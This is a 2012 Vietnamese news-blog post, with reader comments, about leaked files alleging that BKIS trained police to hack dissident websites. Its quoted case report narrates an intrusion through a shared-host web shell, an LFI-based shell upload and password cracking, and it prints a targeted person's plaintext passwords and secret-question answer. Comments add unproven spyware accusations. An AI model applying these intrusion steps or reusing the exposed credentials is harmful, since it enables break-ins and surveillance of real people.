Trung tâm An Ninh Mạng Bách Khoa (BKIS) huấn luyện Tổng Cục 5 (Bộ Công An) cách hack các trang web lề trái?

  • Bởi Admin
    10/03/2012
    24 phản hồi

    Theo thông tin từ diễn đàn HVA, hacker đã đột nhập vào hệ thống mạng của BKIS, lấy đi các tài liệu quan trọng, trong đó có các dự án đặc biệt của BKIS như lời giới thiệu sau đây của chính hacker:

    KỲ 1: NHỮNG "SPECIAL PROJECTS" CỦA BKIS

    Tiếp theo yêu cầu của đông đảo cư dân mạng, để chứng tỏ những gì chúng tôi nắm giữ, chúng tôi tiếp tục công bố những gói data nội bộ thể hiện toàn bộ "thâm cung bí sử" của Bkis và những hoạt động của công ty này.

    KỲ 1: NHỮNG "SPECIAL PROJECTS" CỦA BKIS

    1. APCERT 2009: Nguyễn Minh Đức và Đỗ Mạnh Dũng đã biểu diễn những gì?

    2. Korea DDoS: Bkis đã tìm thấy gì trong vụ này để trở thành "niềm tự hào" của giới bảo mật Việt Nam?

    3. TC5: Nhóm "Task Force" của Bkis đã huấn luyện TC5 như thế nào? Họ đã thể hiện đạo đức nghề nghiệp ra sao?

    4. Underground Team: Nhóm "Underground" của Bkis đã thực hiện những phi vụ điều tra công nghệ cao gì?

    Toàn bộ thông tin nằm ở đây, mời cư dân mạng xem xét và đánh giá để có một góc nhìn khác hơn về BKIS!

    http://ubuntuone.com/4ENufHhmFeLa4iOXGfalX7 [Dân Luận: Không khuyến khích độc giả tự tải xuống và mở ra xem nếu thiếu các kỹ năng máy tính cần thiết để tự bảo vệ mình]

    (Special thanks to phanledaivuong)

    Nếu độc giả tải xuống tập tin 1st.rar và gỡ nén, sẽ thấy các thông tin liên quan đến các dự án đặc biệt của BKIS như sau:

    screen_shot_2012-03-09_at_18.03.42.png

    Trong thư mục TC5 có một số bài thuyết trình hướng dẫn cách hack các trang web, kèm theo các thông tin "tình báo" khá đơn giản về nhiều trang web lề trái. Có một tài liệu đáng chú ý:

    Kinh nghiệm điều tra

    Tác giả: MinHu

    Mức độ: Tuyệt mật

    Mục đích: Thông qua hình thức kể chuyện về các vụ án đã thực hiện nhằm truyền lại các kinh nghiệm cũng như bài học cho lớp kế cận.

    Những người được phép đọc: Là người được giám đốc hoặc tác giả chỉ định trực tiếp. Tài liệu chỉ được phép đọc mà không được phép sao chép dưới bất kỳ hình thức nào khác.

    Chuyên án 1: Điều tra website phản động ddcnd.org

    Chuyên án 2: Điều tra kẻ cung cấp thông tin cho website phản động: baotoquoc.com

    Tóm tắt: Qua tìm hiểu sơ bộ website baotoquoc.com được một kẻ có nick name là vantuyen.net tạo ra. Kẻ này còn làm chủ rất nhiều website khác như: vantuyen.net, quanvan.net, coinguon.us … đều đăng tải nội dung phản động. Kết quả điều tra sau này cho thấy đối tượng quản lý đồng thời hơn 20 website đều có lượng người dùng khá lớn.

    Các domain đều được quản lý bởi emai: [email protected] . Đây sẽ là mục tiêu quan trọng nhất.
    Do baotoquoc.com thực chất là blog của wordpress và chạy trực tiếp trên server của wordpress với subdomain là baotoquoc.wordpress.com nên xác suất có lỗi của website này là tương đối thấp. Vì vậy định hướng sẽ xâm nhập vào các website khác của đối tượng, để khai thác thông tin, dò các password sử dụng chung để đoán password gmail. Nắm được email: [email protected] sẽ nắm được toàn bộ hệ thống.

    Xâm nhập vantuyen.net:

    Do vantuyen, quanvan và mốt số site khác của đối tượng sử dụng chung một portal giống nhau, sau một thời gian thu thấp các thông tin xung quanh về đối tượng, hệ thống ip, máy chủ, quyết định chọn website vantuyen.net làm mục tiêu.

    Vantuyen.net được host trên HostGator và server có hỗ trợ một dạng như mod security (chưa rõ là gì) khiến cho việc khai thác sql injection hay xss trở thành vô vọng. Hơn nữa có ban ip và chống ddos nên quét bằng Acunetix một lúc là bị chặn dẫn đến việc không thể xây dựng được cấu trúc cây thư mục. Quay sang Local Attack thì cần phải upload được shell lên server. Các website hàng xóm chủ yếu là html. May sao có 1 link shell trên server do GuYi cung cấp (chính xác là user và pass của một cpanel user). Sau khi có shell, tiến hành thử việc crack password cpanel của user vantuyen nhưng không thành công. Chắc chắn user này được đặt password đủ phức tạp.

    Việc local diễn ra không dễ dàng như mong đợi. Mặc dù có thể symlink được, nhưng thực chất server chặn do đó chỉ xem kết quả được bằng cách view source file .shtml. Hơn nữa mặc dù local được file nhưng không local được thư mục do đó không xây dựng được cấu trúc cây thư mục. Qua việc view source file index.php rồi từ đó view source các file có liên quan trong source code thì cũng tìm được file config của hệ thống. Kết nối được database và kiểm soát dữ liệu. Có một hạn chế là chưa thể uplaod shell trực tiếp lên vantuyen.net được vì thư mục quản trị bị đổi tên. Mãi sau này mới biết tên là http://vantuyen.net/a12260http://vantuyen.net/a12260NO (không thể đoán được), chưa kể thư mục admin còn đặt thêm htaccess dù có đoán được đường dẫn đi nữa cũng không thể vào được (user vt12260, pass là vt122601). Về sau upload shell lên được trực tiếp văn tuyển bằng cách dày công đọc code ( đoán rằng do code tự viết nên kiểu gì cũng có lỗi, chính xác là thuê 1 đồng chí khác ở Việt Nam viết)

    Qua google hacking và website bị lỗi directory index list ta nắm được thêm rất nhiều thông tin về cấu trúc thư mục của website. Tuy nhiên thông tin về folder quản trị lại không thể nắm được. Một kết quả quan trọng mà google hacking mang lại là chúng ta biết được tồn tại file: WS_FTP.LOG (là log FTP) trong tất cả các thư mục. Sau khi download file log FTP trên của thư mục gốc chúng ta biết được danh sách các file, folder mà đối tượng đã từng upload lên. Trong đó rất tiếc là không có thông tin về folder admin vì hacker sau đó đã đổi tên lại, việc đổi tên này không ghi trong log. Từ danh sách các file trên chúng ta download được 1 file .rar chứa mã nguồn của toàn bộ hệ thống, có ích trong việc đọc code và tìm lỗi sau này.
    Sau một thời gian khai thác thông tin có được từ những kết quả điều tra trên vẫn bế tắc, quyết định phải upload shell lên server cho kỳ được nhằm thực hiện việc thay đổi file đăng nhập để chiếm password. Để làm được điều này, sau khi mày mò tìm trang quản trị không được, quyết định chuyển sang hướng đọc code để khai thác lỗi.

    Các lỗi đã được duyệt qua gồm LFI, RFI, Upload, code injection, … nhưng cuối cùng chỉ có thể sử dụng được một lỗi LFI, do server có cấu hình security nên RFI không sử dụng được nếu không sẽ dễ hơn rất nhiều. Từ LFI ta cho inject một đoạn code upload ngắn rồi upload shell code lên. Từ đó nắm được hoàn toàn website. Rất tiếc là website được quản trị thông qua folder admin được xác thực bằng htaccess password. Phải sử dụng John and Ripper mới crack được. Password này lại không trùng với pass gmail.

    Khai thác dữ liệu có được từ vantuyen.net

    Chưa bao giờ việc điều tra lại mang lại nhiều dữ liệu về một đối tượng như lần này. Đầu tiên từ việc nắm được file config website vantuyen.net ta có được password đăng nhập cơ sở dữ liệu, một yahoo mail liên lạc của đối tượng là: [email protected], password là PKVNpleiku (sau này ngẫm mai chỉ đoán mà pass là Phong Kiến Việt Nam).

    Đăng nhập email trên cho chúng ta hàng ngàn bức thư gồm các loại sau đây: thư liên lạc để gửi bài phản động, thư quản lý hosting và domain của đối tượng. Đáng tiếc email này hacker đã không còn sử dụng nữa và mọi thông tin quan trọng đều chuyển sang email [email protected], mọi thư gửi tới email này đều được trả lời yêu cầu gửi lại vào gmail. Cho nên chỉ có thể khẳng định, email này đã từng là một email rất quan trọng mà thôi.

    Việc điều tra theo hướng khai thác thông tin có trong database không mang lại nhiều kết quả. Database chỉ có một bảng quan trọng là bảng user, có 8 member nhưng đều ở dạng inactive. Chỉ biết được tên, email và mật khẩu đã mã hóa bằng lệnh password của mysql. Đã cố gằng crack thử các password ở đây (bằng Cain) nhưng chỉ ra 3/8 password và các password này không thể sử dụng thêm trong các trường hợp khác.

    Ngoài ra chúng ta cũng tìm được thông tin quan trọng khác của đối tượng là câu hỏi bí mật mà đối tượng thường xử dụng khi đăng ký username là: phuc (bạn thân nhất) và một nick yahoo mà đối tượng thường xuyên xử dụng để liên lạc là: [email protected]

    Việc điều tra trở nên bế tắc khi email tìm được có rất nhiều thư nhưng đều đã quá cũ, password cũng như domain registrant đã thay đổi. Sau này dù đã upload được shell lên website nhưng vẫn không lấy được password gmail.

    Chiến đấu: Ngày 10/8

    Bài học:

    1. Cần phải chuẩn bị shell trên các share hosting bằng cách chạy sẵn các tool brute force hoặc tối thiểu là chuẩn bị sẵn tool để khi cần là crack password ngay được. Vẫn có rất nhiều người dùng đặt password mặc định.
    2. Định dạng file .shtml là gì? Vai trò của nó trong việc local via symlink?
    3. Cần sử dụng thông tin về ngày tháng năm sinh tốt hơn. Ở đây hacker là vantuyen đã sử dụng ngày tháng năm sinh vào trong cách đặt tên thư mục và password.
    4. Cần phải tìm hiểu thêm về John and Ripper, khả năng crack pass shadow để tận dụng trong những trường hợp khác.

    Còn đây là một số bằng chứng ghi lại chuyên án hack trang ddcnd.org:

    hacker.png

    list_user.png

    Tuy rằng chúng tôi chưa khẳng định được 100% đây là thông tin thực, nhưng nếu BKIS thực sự tham gia các dự án như thế này thì thật không còn gì để nói!

    Hãy chia sẻ suy nghĩ của bạn

    24 phản hồi

    Nhát sĩ Tô Hải được các đồng chí an ninh nhắc tên một cách trìu mến thay vì hằn học cay cú, chúc mừng nhát sĩ.

    Trích dẫn:
    Hacker Sinh Tử Lệnh là ai?

    Mới chỉ ở vào quý đầu tiên của năm 2012, tuy nhiên tình trạng hacker tấn công chiếm quyền kiểm soát những website đình đám tại Việt Nam đã lên tới mức báo động. Lần lượt những trang web của Bkav, Unikey, website trường nơi em “Quỳnh Anh got talent” học tập và đình đám nhất là vụ báo điện tử VietNamNet bị hacker tấn công DDoS trong năm 2011.

    Cho đến tận sáng ngày 22/3 vừa qua, Đại tá Trần Văn Hòa, Cục phó Cục Cảnh sát phòng chống Tội phạm Công nghệ cao – C50 (Bộ Công an) đã tuyên bố tại một cuộc hội thảo về bảo mật tại Hà Nội rằng thủ phạm tấn công website của Bkav và Báo điện tử VietNamNet là do nhóm hacker mang tên “Sinh Tử Lệnh” gây ra. Vậy nhóm hacker này có thân thế ra sao?

    http://vietnamnet.vn/vn/cong-nghe-thong-tin-vien-thong/66127/hacker-sinh-tu-lenh-la-ai-.html

    Admin viết:
    Một phân tích trái chiều nhưng cũng có logic được nêu tại diễn đàn HVAOnline.net:

    Flicker675 wrote:

    ...
    - Việc BKIS đào tạo cho các bên Công An đã được public từ lâu http://www.bkav.com.vn/ho_tro_khach_hang/-/view_content/content/be-giang-lop-hoc-chuyen-vien-an-ninh-mang-bcse-cho-c15). BKIS là trung tâm nghiên cứu của Trường đại học, việc có các khóa đào tạo là bình thường. Giáo trình đào tạo chương trình này cũng được public:

    Nguồn: http://bkna.com.vn/home/default.aspx?noidung=GioiThieuBCSE

    ...

    http://www.hvaonline.net/hvaonline/posts/list/1980/41193.hva

    Việc BKIS đào tạo cho các bên Công An đã được public từ lâu thì là việc bình thường vì an ninh cũng phải đi học hỏi như mọi người.

    Ngoài chương trình public này, còn có những thỏa thuận kín nào khác, đây mới là cái làm nhiều người suy đoán. Tụi an ninh, ở đa số các nước, thường là kẻ hay vi phạm luật pháp nhất, với danh nghĩa bảo vệ an ninh quốc gia. Tụi an ninh này, vì lý do bảo mật, khó có ai biết chúng mò việc gì, cách nào, thường được cấp trên cao cấp trong chính quyền bao che và dùng trong các thủ đoạn chính trị. Thông thường bọn an ninh này phải được một viện chuyên trách của QH giám sát công việc của chúng

    Một phân tích trái chiều nhưng cũng có logic được nêu tại diễn đàn HVAOnline.net:

    Flicker675 wrote:

    - Tóm lại là không tin được các dữ liệu này vì đã qua tay hacker, đã có chỉnh sửa. STL đã gắp lửa bỏ tay người, và cả 3 ông BKIS, CMC, HVA-Postmodernism đều là nạn nhân.

    - Thông tin về hack trong file 1st.rar không có gì để căn cứ là của BKIS. Thông tin về hack thì STL có đầy, gói dữ liệu này là do STL đã cố tình đưa lẫn vào những dữ liệu thông thường lấy được từ BKIS (kèm mấy file APCERT để cho nó có vẻ thật)

    - Việc BKIS đào tạo cho các bên Công An đã được public từ lâu http://www.bkav.com.vn/ho_tro_khach_hang/-/view_content/content/be-giang-lop-hoc-chuyen-vien-an-ninh-mang-bcse-cho-c15). BKIS là trung tâm nghiên cứu của Trường đại học, việc có các khóa đào tạo là bình thường. Giáo trình đào tạo chương trình này cũng được public:

    Nguồn: http://bkna.com.vn/home/default.aspx?noidung=GioiThieuBCSE

    Một số ví dụ trong chương trình:

    Case-study: Các hình thức tấn công mạng phổ biến
    Case-study 2: Kiểm tra lỗi SQL Injection và biện pháp khắc phục
    Chương 1: Remote Access Security (Truy cập từ xa và các vấn đề an ninh)
    Chương 2: Web Security
    Chương 3: Email Security
    Chương 4: Buffer Overflow (Tràn bộ đệm)
    Case-study 1: Thiết lập hệ thống email an toàn, bảo mật
    Case-study 2: Kiểm tra lỗi SQL Injection và biện pháp khắc phục

    Những nội dung này trung tâm đào tạo an ninh mạng nào cũng sẽ có nội dung đào tạo tương tự. Ví dụ đào tạo CHE

    Module 08: Sniffers
    Module 09: Social Engineering
    Module 10: Denial of Service
    Module 11: Session Hijacking
    Module 12: Hacking Webservers
    Module 13: Hacking Web Applications
    Module 14: SQL Injection

    Nguồn: http://www.eccouncil.org/courses/certified_ethical_hacker.aspx

    Nhìn lại thì thấy trong gói 1st.rar, đúng là chỉ có APCERT là thông tin của BKIS, nhưng thông tin này lại đã được public http://xahoithongtin.com.vn/20090306022322668p0c206/bkis-canh-bao-hien-tuong-phan-mem-diet-virus-lam-hong-windows.htm).

    Các dữ liệu hack trong thư mục còn lại không có gì cho thấy liên quan đến BKIS. Dữ liệu hack này là của STL đưa vào cùng với các dữ liệu liên quan CMC, HVA để gắp lửa bỏ tay người cho cả BKIS, CMC, HVA.

    http://www.hvaonline.net/hvaonline/posts/list/1980/41193.hva

    " Trung tâm An Ninh Mạng Bách Khoa (BKIS) huấn luyện Tổng Cục 5 (Bộ Công An) cách hack các trang web lề trái? "

    Đây là một câu hỏi mà khó có ai khẳng định được thật hay không.

    Nếu dưa vào bản chất toàn trị độc tài của chế độ CSVN thì có rất nhiều khả năng là BKIS hợp tác với an ninh bộ công an VN. Hợp tác này có thể là tự nguyện hoặc bị ép buộc.

    Ngay cả soft chống virus BKIS khi cài đặt, có thể có những mảng codes cung cấp thông tin của máy được cài đặt cũng giống như khi bạn cài đặt các soft thế hệ mới bây giờ, chủ soft (Microsoft, OO, Firefox) có thể thu thập được tin tức khi bạn có sự cố với mục đích hoàn thiện soft và kiểm soát bản quyền.

    Admin viết:

    Chào các ban công dân mạng,

    ...

    3) "Sinh Tử Lệnh" là một bô phận hoạt động của an ninh quốc gia Việt Nam là thật.
    4) Hàng loạt các hackers với trình độ khác nhau được chiêu dụ để làm công tác theo dõi, xâm nhập và đánh phá các trang mạng ngoài lề là thật.

    ...

    http://bkavop.blogspot.com/2012/03/chao-cac-ban-cong-dan-mang-trong-vai.html

    "Sinh Tử Lệnh" là một bô phận "hoạt động" của an ninh quốc gia Việt Nam !
    An ninh VN lựa cái tên lai căng tàu, sặc mùi kiếm hiệp

    Trước đây đã có nhiều suy đoán "Sinh Tử Lệnh" là tin tặc của an ninh Việt Nam, nay càng củng cố thêm việc này.

    Các bác dùng avast, avira cũng tốt mặc dù free nhưng phải update hàng ngày và upgrade khi cần

    Chào các ban công dân mạng,

    Trong vài ngày vừa qua, thế giới mạng Việt Nam lại xôn xao về những "món quà" kế tiếp dành cho BKAV và chúng tôi nhận thấy rất nhiều bạn thắc mắc tại sao chúng tôi không tiếp tục dùng blogspot để công bố thông tin mà phải dời sang những blog khác. Những thắc mắc này càng lúc càng nhiều và xét thấy đây là thắc mắc rất hữu lý. Song song vào đó, sau quá trình phân tích và đối chiếu thông tin thu thập được, chúng tôi nhận thấy nhóm mạo danh "anonymous" đã xen lẫn những thông tin có thật và nguỵ tạo nhằm gây nhiễu thông tin và đánh lạc hướng dư luận.

    Xét thấy thông tin do nhóm mạo danh "anonymous" cung cấp đã đi đến mức nguy hại và phá hỏng tinh thần trung thực, trong sáng và công bằng, chúng tôi quyết định lên tiếng xác thực sự vụ này như sau:

    1) Chúng tôi, anonymous, không liên quan đến những trang blog mạo danh "anonymous" này.
    2) Chúng tôi, anonymous, không chủ trương trưng bày tên tuổi, địa chỉ, số điện thoại và email của những cá nhân vô tội và không liên can.
    3) Chúng tôi, anonymous, không chủ trương gây nhiễu và lan truyền thông tin thất thiệt.
    4) Chúng tôi, anonymous, không bịa đặt và nguỵ tạo bằng chứng để chụp mũ đối tượng.
    5) Chúng tôi, anonymous, chỉ mang lại sự thật và kêu gọi sự trung thực, trong sáng và công bằng.

    Chúng tôi xin xác nhận những điểm sau:

    1) Danh sách khách hàng của BKAV là thật.
    2) BKAV hợp tác và làm việc với tổng cục V là thật.
    3) "Sinh Tử Lệnh" là một bô phận hoạt động của an ninh quốc gia Việt Nam là thật.
    4) Hàng loạt các hackers với trình độ khác nhau được chiêu dụ để làm công tác theo dõi, xâm nhập và đánh phá các trang mạng ngoài lề là thật.

    Chúng tôi, anonymous, những người quan tâm đến việc mang lại sự thật và công bằng mong mỏi các bạn tỉnh táo, khoa học và chính xác. Những thông tin được nhóm anonymous mạo danh có thể dễ dàng kiểm chứng trên mạng. Chỉ cần các bạn tỉnh táo, khoa học, đủ thời gian và kiên nhẫn.

    Trân trọng.

    http://bkavop.blogspot.com/2012/03/chao-cac-ban-cong-dan-mang-trong-vai.html

    Bạch Hùng viết:
    Dân bị trị viết:
    Tôi đề nghị Dân Luận liệt kê ra web và blog mà BKAV liệt vào loại thế lực thù địch để bà con còn biết rõ về cách nghĩ của chính quyền hiện tại quy định như thế nào là thế lực thù địch thì tốt lắm. Vì hiểu được họ thì mới có phương pháp đấu tranh phù hợp với họ mà không bị họ bắt vì 2 bao cao su.

    Việc tìm ra danh sách mấy trang đó thì đơn giản thôi, tuy nhiên vấn đề quan trọng là anh làm cái gì. Làm gì có chuyện chỉ vào mấy trang web chống cộng mà bị đuổi học như bọn rân trủ bịa đặt. Anh tự lập riêng một trang mà vẫn làm các hành động phạm pháp thì mới bị chứ.

    Như tôi, suốt ngày vào trang web phản động là Dân Luận, cũng có sao đâu? Ít ra tôi về Việt Nam chả hề hấn gì!

    Rất cần đấy Bạch Hùng. Vì muốn thắng được kẻ khác trước tiên phải hiểu mình và hiểu kẻ ấy là ai? Vì mới đây Việt Nam có tên trong danh sách ‘Kẻ thù của Internet’ 2012: http://www.voanews.com/vietnamese/news/vietnam/vietnam-enemies-of-internet-03-12-2012-142314265.html

    @Bạch Hùng

    láo vừa chứ cậu, có ngon sách laptop mở danluat hay danlambao gần công an phường/quận mà ngồi độc coi ! dám không hay lén lút núp ở nhà thậm chí lâu lâu phải ngó trước ngó sau có ai dòm màn hình không

    láo vừa thôi cậu

    Dân bị trị viết:
    Tôi đề nghị Dân Luận liệt kê ra web và blog mà BKAV liệt vào loại thế lực thù địch để bà con còn biết rõ về cách nghĩ của chính quyền hiện tại quy định như thế nào là thế lực thù địch thì tốt lắm. Vì hiểu được họ thì mới có phương pháp đấu tranh phù hợp với họ mà không bị họ bắt vì 2 bao cao su.

    Việc tìm ra danh sách mấy trang đó thì đơn giản thôi, tuy nhiên vấn đề quan trọng là anh làm cái gì. Làm gì có chuyện chỉ vào mấy trang web chống cộng mà bị đuổi học như bọn rân trủ bịa đặt. Anh tự lập riêng một trang mà vẫn làm các hành động phạm pháp thì mới bị chứ.

    Như tôi, suốt ngày vào trang web phản động là Dân Luận, cũng có sao đâu? Ít ra tôi về Việt Nam chả hề hấn gì!

    Tôi đề nghị Dân Luận liệt kê ra web và blog mà BKAV liệt vào loại thế lực thù địch để bà con còn biết rõ về cách nghĩ của chính quyền hiện tại quy định như thế nào là thế lực thù địch thì tốt lắm. Vì hiểu được họ thì mới có phương pháp đấu tranh phù hợp với họ mà không bị họ bắt vì 2 bao cao su.

    Chào các bạn đọc Dân Luận,

    Hôm nay nhân dịp Dân Luận đăng tin về trung tâm BKIS này, tôi xin có ý kiến như sau:

    Theo những thông tin mà tôi thu thập được từ nhiều ý kiến khác nhau ngoài xã hội (kể cả kinh nghiệm bản thân) thì phần mềm (Software) diệt Virus BKAV của trung tâm BKIS có chất lượng rất tệ hại. Phải nói là tệ nhất trong tất cả các loại phần mềm diệt Virus (kể cả phần mềm miễn phí) đang có mặt ở thị trường Việt Nam và trên thế giới.

    BKIS tâng bốc sản phẩm BKAV của họ một cách quá lố nhưng chất lượng thực sự rất kém nhưng lại bán với giá bán cao hơn những loại phần mềm diệt Virus khác (như Kaspersky, Avira v..v..). Đã có rất nhiều công ty sau khi mua BKAV về sử dụng được ít ngày đã vội xoá bỏ để cài phần mềm diệt Virus khác.

    Về mặt đạo đức, BKAV chính là công cụ gián điệp nhằm thu thập thông tin gửi về cho BKIS. Nếu ai đã lỡ cài BKAV vào máy tính của mình rồi thì có thể dùng bất kỳ phần mềm diệt Virus khác của nước ngoài để quét thì sẽ phát hiện ra BKAV chính là 1 Virus.

    Vì vậy tôi khuyến cáo mọi người hãy tránh xa BKAV và thông báo rộng rãi cho những người thân quen, bạn bè của mình biết rõ.

    Khứa viết:
    Bạch Hùng viết:
    File Zip này có virus.

    Cảm ơn bác Bạch Hùng. Nhưng hình như người upload họ cũng nói rõ là có vizut trong đó đấy, vì đó công cụ và tư liệu của một số chuyên án cấp nhà nước. Mình không thể giỏi bằng bác Bạch Hùng, nhưng nghe nói vizut chỉ nguy hiểm khi nó được kích hoạt (Run, Open etc) còn không vì vô hại. Những người giỏi hơn cả bác Bạch Hùng (ví dụ như bác Huân) có "tool" để mở xem được cả lõi vizut thì cũng vô tư, không có gì đáng sợ.

    Dân Luận không khuyến khích độc giả mở các tập tin do hacker cung cấp, vì có khả năng hacker cài virus, hoặc các virus do chính nhóm BKAV sưu tầm để diệt ở trong đó. Nếu các bác thực sự biết mình định làm gì thì hãy mở, còn nếu không xin hãy tìm đọc các phân tích của chuyên gia, đừng tự mình lần mò ngó vào dữ liệu.

    Trang web của nhóm hacker tấn công BKAV:

    http://bkavop.blogspot.com/2012/02/mon-qua-so-2-man-tau-hai-ve-bao-mat-cua.html?spref=fb

    Theo như nhóm/người hacker này tuyên bố, họ tấn công BKIS là vì BKIS đã bắt giữ một hacker đột nhập server BKIS trước đó, không phá hoại gì mà chỉ để lại một thông báo đã đột nhập dưới dạng file hacked.html. Tuy nhiên BKIS đã phối hợp cùng bên công an bắt hacker này.

    Bạch Hùng viết:
    File Zip này có virus.

    Cảm ơn bác Bạch Hùng. Nhưng hình như người upload họ cũng nói rõ là có vizut trong đó đấy, vì đó công cụ và tư liệu của một số chuyên án cấp nhà nước. Mình không thể giỏi bằng bác Bạch Hùng, nhưng nghe nói vizut chỉ nguy hiểm khi nó được kích hoạt (Run, Open etc) còn không vì vô hại. Những người giỏi hơn cả bác Bạch Hùng (ví dụ như bác Huân) có "tool" để mở xem được cả lõi vizut thì cũng vô tư, không có gì đáng sợ.

    Trích:

    Đạo đức rất quan trọng với người làm bảo mật

    Bkis thường xuyên tổ chức khảo sát, đánh giá mức độ an toàn của các trang web. Việc đó được thực hiện như thế nào?

    Bkis có chuyên gia thường xuyên đi khảo sát các trang web quan trọng và không quan trọng. Xem trên đó có lỗ hổng không, nếu có thì gửi cảnh báo và hướng dẫn chủ trang web khắc phục. Đây là cách rất hiệu quả. Nếu chỉ cảnh báo chung chung thì ai cũng nghĩ là ông nào đấy dính lỗ hổng chứ không phải mình. Vì thế, có tình huống sau khi Bkis gửi công văn cảnh báo họ mới cuống cuồng lên cho xử lý và có biện pháp đề phòng. Năm qua, Bkis đã cảnh báo lỗ hổng cho 140 cơ quan, sẽ tiếp tục làm trong thời gian tới.

    Đi dò lỗ hổng web của người khác, Bkis có tính đến khả năng bị pháp luật “thổi còi”?

    Chúng tôi đã nghĩ đến việc này và tìm hiểu rất kỹ. Tôi khẳng định là mọi việc khảo sát của Bkis đều tuân thủ các luật hiện có. Bản thân trung tâm cũng đặt ra quy định đạo đức nghề nghiệp, trong đó có quy định rất cụ thể liên quan đến việc khảo sát. Hơn nữa, tất cả những người tham gia khảo sát được sàng lọc và đào tạo rất kỹ, đặc biệt là đánh giá về đạo đức. Làm việc này là những người nắm trong tay công nghệ, nếu cái tâm không trong sáng thì rất nguy hiểm. Bkis có cơ chế giám sát cả về kỹ thuật và quản lý. Đến nay, không có gì đáng tiếc xảy ra. Mặc dù, phải nói là trong quá trình kiểm tra các công ty chứng khoán, họ hoàn toàn có thể trục lợi, chắc chắn có thể làm được, kể cả ngay tại thời điểm này.

    http://ictnews.vn/home/TRANG-CHINH/1/nguoi-viet-c243-the-ghi-danh-trong-ng224nh-bao-mat/9142/index.ict

    “Không có khái niệm tấn công bẩn”

    (Nguoiduatin.vn) - Sau khi Báo điện tử Nguoiduatin.vn bị hacker DDoS, phóng viên đã có cuộc trao đổi với anh Nguyễn Minh Đức, Giám đốc bộ phận An ninh mạng Bkav xung quanh vấn đề này.

    Xin chào anh! Anh có thể chia sẻ với bạn đọc thông tin về tỷ lệ các hình thức tội phạm tin học trong những năm gần đây tại Việt Nam?

    Có nhiều hình thức tấn công mạng khác nhau, chúng có thể được phân loại theo động cơ tấn công như tài chính, chính trị, cạnh tranh không lành mạnh…

    Những hacker thường sử dụng những cách thức như phát tán virus để xây dựng mạng máy tính ma nhằm đánh cắp mật khẩu, dữ liệu quan trọng, phát tán spam hay tấn công từ chối dịch vu... Hacker cũng thực hiện các chiêu thức lừa đảo trực tuyến, hay tấn công vào các website làm thay đổi giao diện, đánh cắp cơ sở dữ liệu…

    Hiện nay trên thế giới có hình thức tội phạm mạng nào thì ở Việt Nam cũng xuất hiện những hình thức tội phạm đó.


    Nguyễn Minh Đức – Giám đốc bộ phận an ninh mạng Bkav

    Trong giới hacker, một số người cho rằng DDoS là hình thức tấn công “bẩn thỉu”, anh nghĩ sao về điều này?

    Theo quan điểm của tôi thì không có khái niệm kiểu tấn công “bẩn”. Tất cả các kiểu tấn công nhằm mục đích phá hoại thì đều vi phạm pháp luật. Không chỉ riêng DDoS mà còn những kiểu tấn công khác.

    Liệu có phương pháp nào để hạn chế, ngăn chặn những cuộc tấn công từ chối dịch vụ?

    Tấn công từ chối dịch vụ là kiểu tấn công gây tê liệt hệ thống mạng, khiến hệ thống ngừng trệ, ảnh hưởng đến uy tín cũng như làm thiệt hại tài chính đối với nạn nhân.

    Theo tôi có hai vấn đề trong việc ngăn chặn các cuộc tấn công DDoS. Về luật pháp: Nếu như luật pháp nghiêm minh, xử phạt tội phạm mạng ở mức độ đúng với tội danh và mang tính răn đe thì sẽ hạn chế được rất nhiều những kẻ tấn công.

    Vấn đề về bài toán công nghệ: Về mặt kỹ thuật có nhiều các biện pháp để hạn chế và làm giảm thiểu các cuộc tấn công DDoS. Các hacker thường sử dụng botnet, là các máy tính nhiễm vi rút bị điều khiển từ xa để tấn công. Như vậy cùng 1 lúc có thể có tới hàng ngàn thậm chí là hàng trăm ngàn máy tính tấn công khiến hệ thống bị tê liệt... Nhưng nếu hệ thống có cài đặt các thiết bị phát hiện thâm nhập được cấu hình hợp lý, kết hợp với tường lửa quy mô, phòng vệ mạnh thì sẽ hạn chế được rất nhiều các cuộc tấn công.

    Trong đội ngũ của anh, có ai từng là những hacker cao thủ không?

    Chúng tôi xác định ngay từ đầu là tuyển những nhân viên không phải hacker, điều đó đã được chúng tôi cân nhắc rất kỹ. Làm việc trong lĩnh vực an ninh mạng đòi hỏi không chỉ về vấn đề kỹ thuật chuyên môn mà còn cả vấn đề đạo đức nghề nghiệp.

    Hiện nay, tuyển một người đủ đức, đủ tài để làm việc cho bộ phận an ninh mạng không phải dễ. Chúng tôi thường xuyên đào tạo và chọn lọc các bạn sinh viên từ năm thứ hai. Sau 3 năm đào tạo cho tới khi tốt nghiệp đại học, các bạn mới tích lũy được đủ kinh nghiệm và khả năng để bắt đầu làm việc chuyên sâu về an ninh mạng.

    Nhiều bạn trẻ ngày nay dành thời gian tìm hiểu cách tấn công phá phách trong thế giới công nghệ thông tin. Theo anh điều đó có gây nguy hiểm cho xã hội?

    Thực tế, trên thế giới các hacker phần lớn là những người trẻ, họ thường thích khám phá, tò mò, chưa ý thức được hành động phá hoại của mình.

    Khi hệ thống Internet ngày càng phát triển, một hành vi phá hoại có thể sẽ gây ra mức độ thiệt hại nghiêm trọng. Vì vậy, hành động phá hoại của bạn trẻ có thể ảnh hưởng lớn đến xã hội, đó là một xu hướng không tốt, đáng báo động.

    Nhìn chung, các hacker có xu hướng tấn công vào các lỗ hổng trên các hệ thống máy chủ hơn là nhắm đến người dùng cá nhân. Nhưng dường như các phần mềm bảo vệ máy chủ chưa được quan tâm đúng mức?

    Thực tế thì cứ hoạt động nào có lợi thì giới tội phạm mạng sẽ hướng tới. Vì vậy, người dùng cá nhân thường hay là đối tượng bị các hacker lợi dụng nhất như: lừa đảo ăn cắp tiền, điều khiển máy tính người dùng để gửi thư rác… Tuy nhiên, các tổ chức, doanh nghiệp lớn như cổng thông tin điện tử, công ty chứng khoán, ngân hàng… cũng là đối tượng hacker nhắm tới.

    Các doanh nghiệp, tổ chức hiện nay chưa đánh giá đúng tầm quan trọng về an ninh mạng. Họ cũng có đầu tư cho việc bảo vệ hệ thống mạng nhưng chưa có được giải pháp tổng thể. Điều đó vô tình đã tạo ra lỗ hổng để hacker xâm nhập.

    Anh có thể nói về mối quan hệ giữa hacker và vi rút trong thực tế?

    Hacker và vi rút có mỗi liên hệ nhất định với nhau. Một số hacker sử dụng vi rút đánh cắp mật khẩu, điều khiển máy tính nạn nhân.

    Trong giới tội phạm mạng có thể chia làm nhiều thành phần: có hacker chuyên về vi rút, có những hacker chuyên về tấn công hệ thống, chuyên lừa đảo…

